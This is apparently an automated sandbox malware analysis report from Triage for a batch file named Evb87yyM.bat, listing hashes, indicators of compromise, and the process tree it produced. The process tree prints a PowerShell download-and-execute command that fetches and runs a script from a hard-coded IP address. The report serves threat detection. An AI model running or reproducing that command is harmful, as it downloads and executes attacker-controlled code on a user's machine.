46f6f9a88c6598831db0c71784a9cce294f3647121cba6e7dafe783523aac095 | Triage

Analysis

max time kernel
123s
max time network
147s
platform
windows10_x64
resource
win10v200430
submitted
04-05-2020 09:10

Sharing

Report Analysis Logs

General

Target

Evb87yyM.bat
Size

190B
MD5

8e4d79c1afbe60f75e7f18f5e125dd5e
SHA1

45a3951131e3b20026690d0d5f3ce0a84d633e31
SHA256

46f6f9a88c6598831db0c71784a9cce294f3647121cba6e7dafe783523aac095
SHA512

3b56433e7e0f688e1c39dac8e3c12e1537ca8c6c6f8dd24cb780ec8d24f6d21c2381eacb1ae4a0785a826f207e8606e3ded0ab904fe86cff10d45c67efa3f3a2

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/Evb87yyM

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1684 1172 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 1684 WerFault.exe
Token: SeBackupPrivilege 1684 WerFault.exe
Token: SeDebugPrivilege 1684 WerFault.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

WerFault.exe

pid	process
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe
1684	WerFault.exe

Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.

Processes:

description flow ioc

HTTP URL 4 http://www.msftconnecttest.com/connecttest.txt

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Evb87yyM.bat"
1⤵
PID:972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Evb87yyM');Invoke-FLEYEFI;Start-Sleep -s 10000"
2⤵
PID:1172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 704
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1684

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1684-0-0x0000000004090000-0x0000000004091000-memory.dmp

Filesize
4KB

Download
memory/1684-1-0x00000000047C0000-0x00000000047C1000-memory.dmp

Filesize
4KB

Download